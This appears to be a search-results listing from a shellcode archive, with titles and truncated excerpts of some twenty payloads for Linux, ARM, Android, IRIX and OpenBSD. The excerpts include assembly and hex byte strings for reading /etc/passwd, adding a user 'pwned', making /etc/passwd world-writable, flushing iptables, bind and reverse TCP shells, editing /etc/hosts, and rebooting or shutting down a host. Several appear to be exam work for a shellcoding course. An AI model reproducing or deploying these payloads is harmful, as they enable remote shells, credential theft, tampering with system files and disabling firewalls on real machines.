7258 matches found
Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)
BITS 64 ; Author Mr.Un1k0d3r - RingZer0 Team ; Read /etc/passwd Linux x8664 Shellcode ; Shellcode size 82 bytes global start section .text start: jmp pushfilename readfile: ; syscall open file pop rdi ; pop path value ; NULL byte fix xor byte rdi + 11, 0x41 xor rax, rax add al, 2 xor rsi, rsi ; s...
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd Shellcode (273 bytes)
; shellcode name adduserpassword ; Author : Christophe G SLAE64-1337 ; Len : 273 bytes ; Language : Nasm ; "name = pwned ; pass = $pass$" ; add user and password with echo cmd ; tested kali linux , kernel 3.12 global start start: jmp short findaddress realstart: pop rdi xor byte rdi + 7 , 0x41 ;...
OpenBSD/x86 - reboot() Shellcode (15 bytes)
// ----------bsd/x86 reboot shellcode----------------- // AUTHOR : beosroot // INFO : OpenBSD x86 reboot shellcode // EMAIL : email protected // email protected char shellcode = "\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80"; int main int ret = int &ret + 2; ret = intshellcode; //...
Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)
; =================================================================== ; Optimized version of shellcode at: ; http://shell-storm.org/shellcode/files/shellcode-867.php ; Author: SLAE64-1351 Keyman ; Date: 14/09/2014 ; ; Length: 105 bytes got shorter by 13 bytes ; ; What's new is that some...
Linux/x86-64 - Bind TCP Stager (4444/TCP) + Egghunter Shellcode (157 bytes)
;Exam Assignment 3 ;implementation of egghunter ;Default egg = "deaddead" ; ;If connected the stager check of egg , if present execute the code ; ;You can send a maximum of 255 bytes egg + code ; ;if no egg , shellcode exit ; ;Christophe G SLAE64 - 1337 ; global start jmp short start startcode :...
Linux/x86-64 - shutdown -h now Shellcode (64 bytes)
; =================================================================== ; Optimized version of shellcode at: ; http://shell-storm.org/shellcode/files/shellcode-877.php ; Author: SLAE64-1351 Keyman ; Date: 14/09/2014 ; ; Length: 64 bytes got shorter by 1 byte :D ; ; What's new is that some...
Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
/ Shell Bind TCP Random Port Shellcode - C Language - Linux/x8664 Copyright C 2013 Geyslan G. Bem, Hacking bits http://hackingbits.com email protected This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free...
Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)
/ Title : tcpbindshell 150 bytes Date : 04 October 2013 Author : Russell Willis Testd on: Linux/x8664 SMP Debian 3.2.46-1+deb7u1 x8664 GNU/Linux $ objdump -D tcpbindshell -M intel tcpbindshell: file format elf64-x86-64 Disassembly of section .text: 0000000000400080 : 400080: 48 31 c0 xor rax,rax...
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)
Linux/x86 - execve/bin/sh + Polymorphic Shellcode 26 bytes. Shellcode exploit for Linuxx86 platform / Description ; Title : Polymorphic execve /bin/sh - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell...
Linux/x86-64 - Flush IPTables Rules (execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL)) Shellcode (43 bytes)
Linux/x86-64 - Flush IPTables Rules execve"/sbin/iptables", "/sbin/iptables", "-F", NULL Shellcode 43 bytes. Shellcode ... / section .text global start start: push 0x3b pop rax cdq push rdx push word 0x462d push rsp pop rcx push rdx mov rbx, 0x73656c6261747069 push rbx mov rbx, 0x2f2f2f6e6962732f...
Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)
Linux/x86-64 - Execute /bin/sh Shellcode 24 bytes. Shellcode exploit for Linuxx86-64 platform / global start section .text start: push 59 pop rax cdq push rdx mov rbx,0x68732f6e69622f2f push rbx push rsp pop rdi push rdx push rdi push rsp pop rsi syscall / include include char code =...
Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)
Linux/x86-64 - Add Map 127.1.1.1 google.lk In /etc/hosts Shellcode 96 bytes. Shellcode exploit for Linuxx86-64 platform / global start section .text start: ;open push 2 pop rax xor rdi, rdi push rdi ; 0x00 mov rbx, 0x7374736f682f2f2f ; ///hosts push rbx mov rbx, 0x2f2f2f2f6374652f ; /etc//// push...
Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)
/ ; Title: Add map in /etc/hosts file - 110 bytes ; Date: 2014-10-29 ; Platform: linux/x8664 ; Website: http://osandamalith.wordpress.com ; Author: Osanda Malith Jayathissa @OsandaMalith global start section .text start: ;open xor rax, rax add rax, 2 ; open syscall xor rdi, rdi xor rsi, rsi push...
Linux/StrongARM - Bind TCP /bin/sh Shell Shellcode (203 bytes)
/ 203 byte StrongARM/Linux bind portshell shellcode funkysh / char shellcode= "\x20\x60\x8f\xe2" / add r6, pc, 32 / "\x07\x70\x47\xe0" / sub r7, r7, r7 / "\x01\x70\xc6\xe5" / strb r7, r6, 1 / "\x01\x30\x87\xe2" / add r3, r7, 1 / "\x13\x07\xa0\xe1" / mov r0, r3, lsl r7 / "\x01\x20\x83\xe2" / add r...
Linux/ARM - execve (/bin/sh, [], [0 vars]) Shellcode (35 bytes)
/ Title : Linux/ARM - execve"/bin/sh", , 0 vars - 35 bytes Date : 2013-09-04 Author : gunslinger yuda at cr0security dot com Tested on : ARM1176 rev6 v6l An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x00. Cr0security.com / include char shellcode = "\x01\x60\x8f\xe2" // add r6, pc, 1...
Android/ARM - Reverse TCP /system/bin/sh Shell (10.0.2.2:0x3412/TCP) Shellcode (79 bytes)
/ This ARM Thumb sc connects to a given IP and port with a shell. Intended for use with Android hence /system/bin/sh. Connects to the provided IP and port with a shell no null bytes in the code, but does this really matter these days? it could be fixed with just a few instructions. Released to th...
Linux/ARM - chmod(/etc/passwd, 0777) Shellcode (39 bytes)
/ Title : Linux/ARM - chmod"/etc/passwd", 0777 - 39 bytes Date : 2013-09-04 Author : gunslinger yuda at cr0security dot com Tested on : ARM1176 rev6 v6l An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x00. Cr0security.com / include char shellcode = "\x01\x60\x8f\xe2" // add r6, pc, 1...
IRIX - execve (/bin/sh -c) Shellcode (72 bytes)
char cmdshellcode= "\x04\x10\xff\xff" / bltzal $zero, / "\x24\x02\x03\xf3" / li $v0,1011 / "\x23\xff\x08\xf4" / addi $ra,$ra,2292 / "\x23\xe4\xf7\x40" / addi $a0,$ra,-2240 / "\x23\xe5\xfb\x24" / addi $a1,$ra,-1244 / "\xaf\xe4\xfb\x24" / sw $a0,-1244$ra / "\x23\xe6\xf7\x48" / addi $a2,$ra,-2232 /...
IRIX - execve (/bin/sh) Shellcode (68 bytes)
/ 68 byte MIPS/Irix PIC execve shellcode. -scut/teso / unsigned long int shellcode = 0xafa0fffc, / sw $zero, -4$sp / 0x24067350, / li $a2, 0x7350 / / dpatch: / 0x04d0ffff, / bltzal $a2, dpatch / 0x8fa6fffc, / lw $a2, -4$sp / / a2 = char envp = NULL / 0x240fffcb, / li $t7, -53 / 0x01e07827, / nor...
Linux/StrongARM - setuid() Shellcode (20 bytes)
/ 20 byte StrongARM/Linux setuid shellcode funkysh / char shellcode= "\x02\x20\x42\xe0" / sub r2, r2, r2 / "\x04\x10\x8f\xe2" / add r1, pc, 4 / "\x12\x02\xa0\xe1" / mov r0, r2, lsl r2 / "\x01\x20\xc1\xe5" / strb r2, r1, 1 / "\x17\x0b\x90\xef"; / swi 0x90ff17 /...